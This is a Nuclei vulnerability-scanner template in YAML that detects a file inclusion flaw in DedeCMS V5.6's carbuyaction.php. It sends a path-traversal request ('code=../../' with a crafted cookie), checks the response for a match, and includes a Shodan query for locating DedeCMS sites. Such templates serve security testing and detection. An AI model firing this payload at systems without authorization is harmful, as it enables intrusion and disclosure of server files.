nuclei-templates/http/vulnerabilities/dedecms/dedecms-carbuyaction-filein...

40 lines
1.2 KiB
YAML

id: dedecms-carbuyaction-fileinclude
info:
name: DedeCmsV5.6 Carbuyaction Fileinclude
author: pikpikcu
severity: high
description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
reference:
- https://www.cnblogs.com/milantgh/p/3615986.html
classification:
cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: dedecms
product: dedecms
shodan-query: http.html:"power by dedecms" || title:"dedecms"
tags: dedecms
http:
- method: GET
path:
- '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../'
headers:
Cookie: code=cod
host-redirects: true
matchers-condition: and
matchers:
- type: word
words:
- "Cod::respond()"
part: body
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022079e53f415cd7ecf438350eb195d0243b8346753b0265de35010f9e2cdb0181c5022100e0a341fe8353586902f747569b8f7ed77c49c9ac34b01f7c7774a00adbc85208:922c64590222798bb761d5b6d8e72950